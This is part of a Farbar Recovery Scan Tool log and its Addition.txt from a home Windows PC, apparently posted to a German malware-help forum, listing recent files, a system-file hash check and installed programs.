2013-08-03 15:01 - 2012-04-02 12:26 - 00000000 ____D C:\Users\Niklas\AppData\Local\LogMeIn Hamachi
2013-08-02 20:32 - 2012-11-01 13:12 - 00000000 ____D C:\Users\Niklas\Desktop\minecraft modding
2013-08-02 17:55 - 2013-08-02 17:53 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64 (2).exe
2013-08-02 17:14 - 2013-08-02 17:14 - 00001166 _____ C:\Windows\wininit.ini
2013-08-02 17:14 - 2012-06-10 20:03 - 00000000 ____D C:\Program Files\Web Assistant
2013-07-31 21:36 - 2013-06-11 13:23 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\uTorrent
2013-07-31 18:45 - 2013-07-01 18:42 - 00000000 ____D C:\Users\Niklas\minecraft
2013-07-31 18:42 - 2013-07-31 18:41 - 08086972 _____ C:\Users\Niklas\Desktop\Lan welt , N-M.rar
2013-07-31 18:33 - 2013-07-31 18:33 - 00506821 _____ C:\Users\Niklas\Downloads\MC_Open_Launcher (2).jar
2013-07-31 18:33 - 2013-07-31 18:33 - 00506821 _____ C:\Users\Niklas\Desktop\MC_Open_Launcher (2).jar
2013-07-31 18:30 - 2013-07-31 18:30 - 00000453 _____ C:\Users\Niklas\Downloads\mol.txt
2013-07-31 18:27 - 2013-06-20 16:46 - 00000364 _____ C:\Users\Niklas\Documents\launcher_profiles.json
2013-07-31 18:06 - 2013-07-31 18:06 - 00000083 _____ C:\Users\Niklas\Desktop\MOL_Properties.properties
2013-07-31 18:05 - 2013-07-31 18:05 - 00704826 _____ C:\Users\Niklas\Downloads\Minecraft 1.6.1.zip
2013-07-31 17:54 - 2012-09-23 19:21 - 00000000 ____D C:\Users\Niklas\AppData\Local\Paint.NET
2013-07-31 17:50 - 2013-07-31 17:50 - 00352775 _____ C:\Users\Niklas\Downloads\OptiFine_1.5.2_HD_D5.zip
2013-07-31 15:51 - 2013-07-31 15:51 - 00097946 _____ C:\Users\Niklas\Downloads\TooManyItems2013_04_25_1.5.2 (3).zip
2013-07-31 15:28 - 2013-07-31 15:27 - 02014600 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.712.zip
2013-07-31 14:48 - 2013-07-31 14:48 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2013-07-31 14:47 - 2012-03-23 19:58 - 00000000 ____D C:\Program Files\WinRAR
2013-07-31 14:37 - 2009-07-14 07:08 - 00032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2013-07-31 14:26 - 2013-07-31 14:26 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\WinRAR
2013-07-31 14:00 - 2013-07-31 14:00 - 01758824 _____ C:\Users\Niklas\Downloads\winrar-x64-420d (1).exe
2013-07-31 13:41 - 2013-07-31 13:42 - 00263592 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2013-07-31 13:41 - 2013-07-31 13:42 - 00175016 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2013-07-31 13:41 - 2013-07-31 13:42 - 00175016 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2013-07-31 13:41 - 2013-07-31 13:42 - 00096168 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2013-07-31 13:41 - 2013-07-31 13:41 - 00000000 ____D C:\Program Files (x86)\Java
2013-07-31 13:41 - 2013-07-31 13:40 - 31714728 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-i586.exe
2013-07-31 13:41 - 2012-08-06 10:08 - 00867240 _____ (Oracle Corporation) C:\Windows\SysWOW64\npdeployJava1.dll
2013-07-31 13:41 - 2011-10-27 22:03 - 00789416 _____ (Oracle Corporation) C:\Windows\SysWOW64\deployJava1.dll
2013-07-31 13:39 - 2013-07-31 13:37 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64 (1).exe
2013-07-31 13:30 - 2013-07-31 13:31 - 00312232 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2013-07-31 13:30 - 2013-07-31 13:31 - 00189352 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2013-07-31 13:30 - 2013-07-31 13:31 - 00188840 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2013-07-31 13:30 - 2013-07-31 13:31 - 00108968 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2013-07-31 13:30 - 2012-01-19 19:55 - 01093032 _____ (Oracle Corporation) C:\Windows\system32\npdeployJava1.dll
2013-07-31 13:30 - 2011-10-27 22:04 - 00972712 _____ (Oracle Corporation) C:\Windows\system32\deployJava1.dll
2013-07-31 13:29 - 2013-07-31 13:28 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64.exe
2013-07-31 13:20 - 2011-10-27 22:03 - 00000000 ____D C:\Program Files\Java
2013-07-31 13:19 - 2013-07-31 13:19 - 00903080 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\chromeinstall-7u25.exe
2013-07-31 13:14 - 2013-07-31 13:14 - 02033732 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.1.738.zip
2013-07-28 19:18 - 2013-07-28 19:13 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Stella
2013-07-28 19:13 - 2013-07-28 19:13 - 01486815 _____ (The Stella Team                                             ) C:\Users\Niklas\Downloads\Stella-3.6-win32.exe
2013-07-28 19:13 - 2013-07-28 19:13 - 00000000 ____D C:\Program Files (x86)\Stella
2013-07-28 19:08 - 2013-07-28 19:08 - 00006628 _____ C:\Users\Niklas\Downloads\E.T. the Extra-Terrestrial.zip
2013-07-28 16:49 - 2013-07-28 16:49 - 00003000 _____ C:\{BE567149-6FEF-4828-835D-9A7A4805359B}
2013-07-28 16:43 - 2013-07-28 16:43 - 00000000 ____D C:\Windows\System32\Tasks\Norton Identity Safe
2013-07-28 15:04 - 2013-07-27 15:25 - 00000000 ____D C:\Program Files (x86)\Landwirtschafts Simulator 2013
2013-07-28 14:32 - 2012-01-21 15:51 - 00000000 ____D C:\Windows\AutoKMS
2013-07-28 14:28 - 2013-07-28 14:25 - 58909032 _____ (GIANTS Software                                             ) C:\Users\Niklas\Downloads\FarmingSimulator2013Patch1.4DE.exe
2013-07-27 23:36 - 2013-07-26 18:14 - 00000000 ____D C:\ProgramData\SystemExplorer
2013-07-27 23:36 - 2013-07-23 12:46 - 00000000 ___HD C:\Windows\Icons
2013-07-27 23:36 - 2013-07-22 13:12 - 00000000 ____D C:\Users\Niklas\Desktop\left4dead
2013-07-27 23:36 - 2013-07-21 15:23 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Secret Maryo Chronicles
2013-07-27 23:36 - 2013-06-23 11:26 - 00000000 ____D C:\Users\Niklas\Desktop 4
2013-07-27 23:36 - 2013-06-22 18:14 - 00000000 ____D C:\Program Files\Unlocker
2013-07-27 23:36 - 2013-05-28 19:37 - 00000000 ____D C:\Users\Niklas\Desktop\LogMeIn Hamachi
2013-07-27 23:36 - 2013-05-13 18:21 - 00000000 ____D C:\Users\.wh..wh.plnk
2013-07-27 23:36 - 2013-05-13 18:21 - 00000000 ____D C:\Users\.wh..wh.orph
2013-07-27 23:36 - 2013-04-21 18:24 - 00000000 ____D C:\Windows\pss
2013-07-27 23:36 - 2012-01-19 19:56 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\vlc
2013-07-27 23:36 - 2012-01-19 09:31 - 00000000 ____D C:\Users\SYSTEM
2013-07-27 23:36 - 2011-10-27 21:43 - 00000000 ____D C:\Program Files\Intel
2013-07-27 23:36 - 2011-10-27 21:34 - 00000000 ____D C:\ProgramData\Intel
2013-07-27 23:36 - 2011-10-27 21:33 - 00000000 ____D C:\Program Files\Common Files\Intel
2013-07-27 23:36 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\Branding
2013-07-27 23:36 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\AppCompat
2013-07-27 23:33 - 2013-07-22 12:04 - 00000000 ___HD C:\VTRoot
2013-07-27 23:33 - 2013-07-20 21:17 - 00000000 ____D C:\ProgramData\Package Cache
2013-07-27 23:33 - 2012-11-02 15:37 - 00000000 ____D C:\Users\Niklas\Documents\MAGIX
2013-07-27 23:33 - 2012-05-25 19:12 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Notepad++
2013-07-27 23:33 - 2012-01-19 09:33 - 00000000 ____D C:\Users\Niklas\AppData\Local\VirtualStore
2013-07-27 23:32 - 2011-10-27 21:43 - 00000000 ____D C:\Program Files (x86)\Cisco
2013-07-27 18:15 - 2013-07-27 18:15 - 00237126 _____ C:\Users\Niklas\Downloads\Bankofhagenstedt.exe
2013-07-27 16:49 - 2013-07-27 16:47 - 07406374 _____ C:\Users\Niklas\Downloads\VeenhuisW400.exe
2013-07-27 15:36 - 2013-07-27 15:35 - 00000000 ____D C:\Users\Niklas\Documents\My Games
2013-07-27 15:28 - 2013-07-27 15:28 - 00001287 _____ C:\Users\Niklas\Desktop\Landwirtschafts Simulator 2013 .lnk
2013-07-27 14:14 - 2013-07-27 14:14 - 00000000 ____D C:\Windows\System32\Tasks\Norton AntiVirus
2013-07-27 14:12 - 2013-07-27 14:12 - 00000000 ____D C:\Windows\system32\Drivers\NSTx64
2013-07-27 14:12 - 2013-07-27 14:12 - 00000000 ____D C:\Program Files (x86)\Norton Identity Safe
2013-07-27 14:11 - 2013-07-27 14:11 - 00003218 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2013-07-27 14:10 - 2013-07-27 14:10 - 00000000 ____D C:\Windows\system32\Drivers\NAVx64
2013-07-27 14:00 - 2013-07-27 13:53 - 186556480 ____N (Symantec Corporation) C:\Users\Niklas\Downloads\NAV-ESD-20-4-0-40-GE.exe
2013-07-27 13:50 - 2013-07-27 13:50 - 00867880 _____ C:\Users\Niklas\Downloads\Norton20_Removal_Tool.exe
2013-07-27 13:50 - 2013-07-27 13:50 - 00867880 _____ C:\Users\Niklas\Desktop\Norton20_Removal_Tool.exe
2013-07-27 13:42 - 2013-07-23 14:48 - 00195816 _____ C:\Users\Niklas\AppData\Local\GDIPFONTCACHEV1.DAT
2013-07-27 13:09 - 2012-09-02 13:23 - 00000000 ____D C:\Program Files (x86)\BlueJ
2013-07-26 20:32 - 2013-07-26 20:32 - 01975130 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.684 (2).zip
2013-07-26 20:32 - 2013-07-26 20:31 - 01975130 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.684 (1).zip
2013-07-26 19:42 - 2013-07-26 09:34 - 00633296 _____ C:\Windows\system32\FNTCACHE.DAT
2013-07-26 19:39 - 2013-07-26 19:38 - 00695296 _____ (AnjoCaido) C:\Users\Niklas\Desktop\minecraftSP.exe
2013-07-26 19:32 - 2013-06-21 22:45 - 00000000 ____D C:\Users\Niklas\Desktop\.minecraft
2013-07-26 19:26 - 2012-07-28 14:22 - 00000000 ____D C:\Dev-Cpp
2013-07-26 19:24 - 2013-07-26 19:24 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\TrojanHunter
2013-07-26 19:16 - 2013-07-26 19:16 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422 (1).exe
2013-07-26 19:03 - 2013-07-26 19:03 - 00059392 ____R C:\Windows\SysWOW64\streamhlp.dll
2013-07-26 19:03 - 2013-07-26 19:03 - 00000000 ____D C:\ProgramData\TrojanHunter
2013-07-26 18:23 - 2013-07-26 18:23 - 04292608 _____ C:\Users\Niklas\Downloads\hamachi_2.1.0.362.msi
2013-07-26 18:14 - 2013-07-26 18:13 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422.exe
2013-07-26 14:34 - 2013-07-26 14:34 - 00137266 _____ C:\Users\Niklas\Downloads\elegant.sit
2013-07-26 14:34 - 2013-07-26 14:34 - 00045185 _____ C:\Users\Niklas\Downloads\elegant.zip
2013-07-26 14:34 - 2013-07-26 14:34 - 00045185 _____ C:\Users\Niklas\Downloads\elegant (1).zip
2013-07-26 14:31 - 2013-07-26 14:31 - 00029060 _____ C:\Users\Niklas\Downloads\Acens.ttf
2013-07-26 09:34 - 2013-07-26 09:34 - 00000000 _____ C:\Windows\setuperr.log
2013-07-26 07:13 - 2013-08-18 18:38 - 02241024 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2013-07-26 07:13 - 2013-08-18 18:38 - 01365504 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2013-07-26 07:13 - 2013-08-18 18:38 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2013-07-26 07:12 - 2013-08-18 18:38 - 19239424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 15405056 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 03958784 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 02647040 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2013-07-26 05:35 - 2013-08-18 18:38 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2013-07-26 05:13 - 2013-08-18 18:38 - 01767936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2013-07-26 05:13 - 2013-08-18 18:38 - 01141248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 14329344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 02877440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 02048512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00391168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2013-07-26 05:11 - 2013-08-18 18:38 - 13761024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2013-07-26 05:11 - 2013-08-18 18:38 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2013-07-26 04:49 - 2013-08-18 18:38 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2013-07-26 04:39 - 2013-08-18 18:38 - 00089600 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2013-07-26 03:59 - 2013-08-18 18:38 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2013-07-25 17:36 - 2013-07-25 17:36 - 00000000 ____D C:\Users\Niklas\AppData\Local\{C938435F-A241-4E9B-80FC-B5E38F7C91FB}
2013-07-25 17:33 - 2013-07-25 17:33 - 00177672 _____ C:\Users\Niklas\Desktop\music1.OGG
2013-07-25 16:59 - 2013-07-25 16:58 - 10627171 _____ C:\Users\Niklas\Documents\lib.rar
2013-07-25 16:55 - 2013-07-25 16:54 - 01981647 _____ C:\Users\Niklas\Documents\minecraftforge-universal-1.5.2-7.8.0.686.zip
2013-07-25 14:39 - 2013-07-25 14:38 - 00570109 _____ C:\Users\Niklas\Downloads\billy-argel_beyond-sky.zip
2013-07-25 13:45 - 2013-07-25 13:45 - 00031788 _____ C:\Users\Niklas\Downloads\thump (1).wav
2013-07-25 11:25 - 2013-08-18 14:00 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2013-07-25 11:04 - 2013-07-25 11:04 - 00002457 _____ C:\Users\Niklas\Downloads\TextFieldDemo.jnlp
2013-07-25 11:04 - 2013-07-25 11:04 - 00002457 _____ C:\Users\Niklas\Downloads\TextFieldDemo (1).jnlp
2013-07-25 10:57 - 2013-08-15 13:53 - 01620992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2013-07-23 21:33 - 2013-07-23 10:36 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Rainmeter
2013-07-23 14:20 - 2012-01-21 11:21 - 00000000 ____D C:\Users\Niklas\.thumbnails
2013-07-23 14:05 - 2013-07-23 14:01 - 80978288 _____ (Intel(R) Corporation) C:\Users\Niklas\Downloads\Wireless_15.3.1_s64.exe
2013-07-23 13:51 - 2012-01-19 20:03 - 00003792 _____ C:\Windows\System32\Tasks\Adobe-Online-Aktualisierungsprogramm
2013-07-23 13:19 - 2013-06-23 11:20 - 00000000 ____D C:\Users\Niklas\Desktop 2
2013-07-23 12:49 - 2013-07-23 12:48 - 04891155 _____ C:\Users\Niklas\Downloads\Eminent.tip
2013-07-23 12:46 - 2013-07-23 12:46 - 01958858 _____ C:\Users\Niklas\Downloads\FarawayDream.tip
2013-07-23 12:28 - 2013-06-30 12:24 - 00000000 ____D C:\Windows\Minidump
2013-07-23 12:26 - 2013-07-23 12:25 - 04396440 _____ (Piriform Ltd) C:\Users\Niklas\Downloads\ccsetup403.exe
2013-07-23 12:13 - 2012-01-19 19:59 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2013-07-23 12:04 - 2013-07-23 12:03 - 02918488 _____ (Martin Malík - REALiX                                       ) C:\Users\Niklas\Downloads\hw64_420.exe
2013-07-23 11:01 - 2013-07-23 10:23 - 00000000 ____D C:\Windows\UXBackup
2013-07-23 10:43 - 2013-07-23 10:41 - 19067867 _____ C:\Users\Niklas\Downloads\omnimo_5_0_for_rainmeter_by_fediafedia.zip
2013-07-23 10:41 - 2013-07-23 10:41 - 05209550 _____ C:\Users\Niklas\Downloads\Omnimo Screenshots - Imgur.zip
2013-07-23 10:35 - 2013-07-23 10:35 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\IObit
2013-07-23 10:20 - 2013-07-23 10:20 - 01386624 _____ C:\Users\Niklas\Downloads\Rainmeter-2.5.exe
2013-07-23 10:20 - 2013-07-23 10:14 - 61091169 _____ C:\Users\Niklas\Downloads\8TP7.zip
2013-07-23 10:12 - 2013-07-23 10:12 - 04685607 _____ C:\Users\Niklas\Downloads\Minecraft-Modpack_1.6.2.zip

Files to move or delete:
====================
C:\Users\Niklas\devcpp-4.9.9.2_setup.exe
C:\Users\Niklas\Minecraft (2).exe
C:\Users\Niklas\prismsetup.exe
C:\Users\Niklas\SkypeSetup.exe
C:\Users\Niklas\SONIC.exe
C:\Users\Niklas\vpsetup.exe

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2013-07-26 16:41

==================== End Of Log
         
Hier die Addition.txt:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21-08-2013 02
Ran by Niklas at 2013-08-22 11:33:53
Running from C:\Users\Niklas\Desktop
Boot Mode: Normal
==========================================================


==================== Installed Programs =======================

   
µTorrent (x32 Version: 3.3.0.29677)
7-Zip 9.20 (x64 edition) (Version: 9.20.00.0)
Adobe AIR (x32 Version: 3.0.0.4080)
Adobe Flash Player 11 ActiveX (x32 Version: 11.6.602.171)
Adobe Flash Player 11 Plugin (x32 Version: 11.6.602.180)
Adobe Reader X (10.1.7) MUI (x32 Version: 10.1.7)
Advanced Archive Password Recovery (x32 Version: 4.54.48.1338)
ALDI SÜD Mah Jong (x32)
AMI VR-pulse OS Switcher (Version: 1.2)
Android SDK Tools (x32 Version: 1.16)
Angebote ALDI SÜD Bildschirmschoner (x32)
Ashampoo Burning Studio (x32 Version: 10.0.10)
Ashampoo Burning Studio 2010 Advanced (x32 Version: 9.2.4)
Ashampoo Photo Commander (x32 Version: 9.2.0)
Ashampoo Photo Commander 11 v.11.0.3 (x32 Version: 11.0.3)
Ashampoo Photo Optimizer (x32 Version: 4.0.0)
Ashampoo Snap (x32 Version: 4.3.0)
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (x32 Version: 1.0.0.39)
Audacity 2.0.3 (x32 Version: 2.0.3)
Avira Free Antivirus (x32 Version: 13.0.0.3885)
Axialis Screensaver Producer 4.2 (x32 Version: 4.2)
Bandisoft MPEG-1 Decoder (x32)
BandzPro (HKCU Version: 1.2.0.0)
BlueStacks App Player (x32 Version: 0.7.16.910)
BlueStacks Notification Center (x32 Version: 0.7.16.910)
BroadCam Video Streaming Server (x32)
Camtasia Studio 7 (x32 Version: 7.1.1)
CCleaner (Version: 3.28)
Cheat Engine 6.3 (x32)
CodeBlocks (HKCU Version: 10.05)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (x32 Version: 15.4.5722.2)
Corel Graphics - Windows Shell Extension (x32 Version: 15.2.0.686)
Corel Graphics - Windows Shell Extension (x32 Version: 15.2.686)
Corel Graphics - Windows Shell Extension 64 Bit (Version: 15.2.686)
CorelDRAW Essentials X5 - Common (x32 Version: 15.3)
CorelDRAW Essentials X5 - Connect (x32 Version: 15.3)
CorelDRAW Essentials X5 - Custom Data (x32 Version: 15.3)
CorelDRAW Essentials X5 - DE (x32 Version: 15.3)
CorelDRAW Essentials X5 - Draw (x32 Version: 15.3)
CorelDRAW Essentials X5 - EN (x32 Version: 15.3)
CorelDRAW Essentials X5 - ES (x32 Version: 15.3)
CorelDRAW Essentials X5 - Extra Content (x32 Version: 15.0)
CorelDRAW Essentials X5 - Extra Content (x32)
CorelDRAW Essentials X5 - Filters (x32 Version: 15.3)
CorelDRAW Essentials X5 - FR (x32 Version: 15.3)
CorelDRAW Essentials X5 - IPM (x32 Version: 15.3)
CorelDRAW Essentials X5 - IT (x32 Version: 15.3)
CorelDRAW Essentials X5 - PHOTO-PAINT (x32 Version: 15.3)
CorelDRAW Essentials X5 - Redist (x32 Version: 15.0)
CorelDRAW Essentials X5 - Setup Files (x32 Version: 15.3)
CorelDRAW Essentials X5 - WT (x32 Version: 15.3)
CorelDRAW Essentials X5 (x32 Version: 15.2.0.686)
CorelDRAW Essentials X5 (x32 Version: 15.3)
CyberLink LabelPrint (x32 Version: 2.5.3624)
CyberLink MediaEspresso (x32 Version: 6.5.1508_36229)
CyberLink MediaShow (x32 Version: 5.1.2414)
CyberLink PhotoNow (x32 Version: 1.1.0.6904)
CyberLink Power2Go (x32 Version: 7.0.0.1327)
CyberLink PowerDirector (x32 Version: 8.0.4020)
CyberLink PowerDVD 10 (x32 Version: 10.0.3225.02)
CyberLink PowerDVD Copy (x32 Version: 1.5.1306)
CyberLink PowerProducer (x32 Version: 5.0.2.3503)
CyberLink YouCam (x32 Version: 3.1.4013)
D3DX10 (x32 Version: 15.4.2368.0902)
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition
Dev-C++ 5 beta 9 release (4.9.9.2) (x32)
Dexpot (HKCU Version: 1.6.9)
DHTML Editing Component (x32 Version: 6.02.0001)
Die Abenteuer von Tim und Struppi - Das Geheimnis der Einhorn 1.0 (x32 Version: 1.0)
DIE SIEDLER - Das Erbe der Könige - Gold Edition (x32 Version: 1.00.0000)
Dolby Home Theater v4 (x32 Version: 7.2.7000.4)
Dungeon Lords Collector's Edition (x32 Version: 1.0.0)
DVD Decrypter (Remove Only) (x32)
Elsword_DE (x32)
Express Zip (x32)
FileZilla Client 3.7.1 (x32 Version: 3.7.1)
Firebird SQL Server - MAGIX Edition (x32 Version: 2.1.31.0)
FormatFactory 2.96 (x32 Version: 2.96)
Fotogalerija Windows Live (x32 Version: 15.4.3502.0922)
Free Fire Screensaver (x32)
Free FLV Converter V 7.5.0 (x32 Version: 7.5.0.0)
GadgetBox (x32 Version: 1.0)
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922)
GameMaker 8.1 (HKCU)
GBox Updater (x32)
GIMP 2.6.8
GlassFish Server Open Source Edition 3.1.2.2
Google Chrome (x32 Version: 28.0.1500.95)
Google Update Helper (x32 Version: 1.3.21.153)
Hex-Editor MX (x32 Version: 6.0)
Hurrican 1.0.0.4 (x32 Version: 1.0.0.4)
ImgBurn (x32 Version: 2.5.8.0)
Inkscape 0.48.4 (x32 Version: 0.48.4)
Intel PROSet Wireless
Intel PROSet Wireless (x32)
Intel(R) Control Center (x32 Version: 1.2.1.1007)
Intel(R) Management Engine Components (x32 Version: 7.0.0.1144)
Intel(R) Processor Graphics (x32 Version: 8.15.10.2538)
Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology (Version: 1.1.0.0537)
Intel(R) PROSet/Wireless WiFi Software (Version: 14.2.1000)
Intel(R) Rapid Storage Technology (x32 Version: 10.6.0.1002)
Intel(R) WiDi (x32 Version: 2.2.14.0)
Internet-TV für Windows Media Center (x32 Version: 4.2.2.0)
Java 7 Update 25 (64-bit) (Version: 7.0.250)
Java 7 Update 25 (x32 Version: 7.0.250)
Java Auto Updater (x32 Version: 2.1.9.5)
Java SE Development Kit 7 Update 5 (64-bit) (Version: 1.7.0.50)
JavaFX 2.1.1 (64-bit) (Version: 2.1.1)
JavaFX 2.1.1 SDK (64-bit) (Version: 2.1.1)
Junk Mail filter update (x32 Version: 15.4.3502.0922)
Kontrolnik Windows Live Mesh ActiveX za oddaljene povezave (x32 Version: 15.4.5722.2)
Landwirtschafts Simulator 2013 (x32 Version: 1.0)
Launch Manager (x32 Version: 1.5.1.4)
LEGO Digital Designer (x32)
LEGO Racers (x32)
LogMeIn Hamachi (x32 Version: 2.1.0.374)
MAGIX Content und Soundpools (x32 Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Demosongs) (Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Demosongs) (x32 Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Synthesizer und Effekte) (Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Synthesizer und Effekte) (x32 Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Version: 19.0.1.36)
MAGIX Music Maker 2013 Premium (Visuals) (Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Visuals) (x32 Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (x32 Version: 19.0.1.36)
MAGIX Music Maker 2013 Premium Soundpools (Version: 1.0.0.0)
MAGIX Music Maker 2013 Soundpools (Version: 1.0.0.0)
MAGIX Screenshare (Version: 4.3.6.1987)
MAGIX Screenshare (x32 Version: 4.3.6.1987)
MAGIX Speed burnR (MSI) (Version: 7.0.2.6)
MAGIX Speed burnR (MSI) (x32 Version: 7.0.2.6)
MAGIX Video deluxe 2013 (Version: 12.0.0.32)
MAGIX Video deluxe 2013 (x32 Version: 12.0.0.32)
Medion Home Cinema (x32 Version: 8.0.3216)
Mesh Runtime (x32 Version: 15.4.5722.2)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319)
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319)
Microsoft .NET Framework 4 Multi-Targeting Pack (x32 Version: 4.0.30319)
Microsoft .NET Framework 4.5 (Version: 4.5.50709)
Microsoft Application Error Reporting (Version: 12.0.6015.5000)
Microsoft Application Error Reporting (x32 Version: 12.0.6012.5000)
Microsoft Help Viewer 1.0 (Version: 1.0.30319)
Microsoft Help Viewer 1.0 Language Pack - DEU (Version: 1.0.30319)
Microsoft Mathematics (64-Bit) (Version: 4.0)
Microsoft Office 2010 (x32 Version: 14.0.4763.1000)
Microsoft Office 2010 Service Pack 1 (SP1)
Microsoft Office Access MUI (German) 2010 (Version: 14.0.6029.1000)
